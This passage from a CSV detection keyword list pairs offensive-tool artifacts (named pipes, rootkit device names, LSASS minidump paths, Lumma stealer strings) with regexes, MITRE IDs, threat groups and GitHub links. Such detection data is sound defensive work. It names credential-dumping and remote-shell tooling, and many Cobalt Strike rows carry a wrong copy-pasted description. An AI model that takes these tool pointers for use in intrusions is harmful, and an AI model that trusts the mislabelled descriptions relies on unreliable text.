Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13635"
"*\\\\.\\pipe\\mal*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\mal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","#namedpipe","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","13636"
"*\\\\.\\pipe\\merlin*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#namedpipe","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","13637"
"*\\\\.\\pipe\\mimikatz*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\mimikatz.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13638"
"*\\\\.\\pipe\\netview*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\netview.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13639"
"*\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13640"
"*\\\\.\\pipe\\portscan*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13641"
"*\\\\.\\pipe\\RemoteMaint*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\RemoteMaint.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#namedpipe","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13642"
"*\\\\.\\pipe\\screenshot*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\screenshot.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13643"
"*\\\\.\\pipe\\sshagent*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\sshagent.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13644"
"*\\\\.\\pipe\\warpzone8*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","#namedpipe","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","13645"
"*\\\\{attacker_ip}\\*",".{0,1000}\\\\\\\\\{attacker_ip\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13646"
"*\\\\{coerce_to}\\*",".{0,1000}\\\\\\\\\{coerce_to\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13647"
"*\\\\127.0.0.1\\pipe\\warpzone8*",".{0,1000}\\\\\\\\127\.0\.0\.1\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","#namedpipe","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","13648"
"*\\127.0.0.1\c$*",".{0,1000}\\\\127\.0\.0\.1\\c\$.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","13649"
"*\\ataDmargorP\\:C*",".{0,1000}\\\\ataDmargorP\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13650"
"*\\c$\Windows\Temp\*.dmp*",".{0,1000}\\\\c\$\\Windows\\Temp\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","13651"
"*\\DCSC_stdInPipe*",".{0,1000}\\\\DCSC_stdInPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","13652"
"*\\DCSC_stdOutPipe*",".{0,1000}\\\\DCSC_stdOutPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","13653"
"*\\Debug\\Injected.dll*",".{0,1000}\\\\Debug\\\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13654"
"*\\DESKTOP-PRINTINGFUN*",".{0,1000}\\\\DESKTOP\-PRINTINGFUN.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","13655"
"*\\Device\\NamedPipe\\NamedPipeMaster*",".{0,1000}\\\\Device\\\\NamedPipe\\\\NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#namedpipe","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","13656"
"*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13657"
"*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13658"
"*\\Device\\StealToken*",".{0,1000}\\\\Device\\\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","13659"
"*\\Driver\\Nidhogg*",".{0,1000}\\\\Driver\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13660"
"*\\Edge\\Usedx765er Data*",".{0,1000}\\\\Edge\\\\Usedx765er\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","13661"
"*\\GetWebDAVStatus.exe*",".{0,1000}\\\\GetWebDAVStatus\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","13662"
"*\\HackSysExtremeVulnerableDriver*",".{0,1000}\\\\HackSysExtremeVulnerableDriver.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13663"
"*\\localhost/pipe/petit\*",".{0,1000}\\\\localhost\/pipe\/petit\\.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13664"
"*\\Locedx765al Staedx765te*",".{0,1000}\\\\Locedx765al\sStaedx765te.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","13665"
"*\\MiniDump\\Decryptor\\Credman*",".{0,1000}\\\\MiniDump\\\\Decryptor\\\\Credman.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13667"
"*\\MiniDump\\Decryptor\\KerberosSessions*",".{0,1000}\\\\MiniDump\\\\Decryptor\\\\KerberosSessions.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13668"
"*\\MiniDump\\Decryptor\\LogonSessions*",".{0,1000}\\\\MiniDump\\\\Decryptor\\\\LogonSessions.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#content","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","13669"
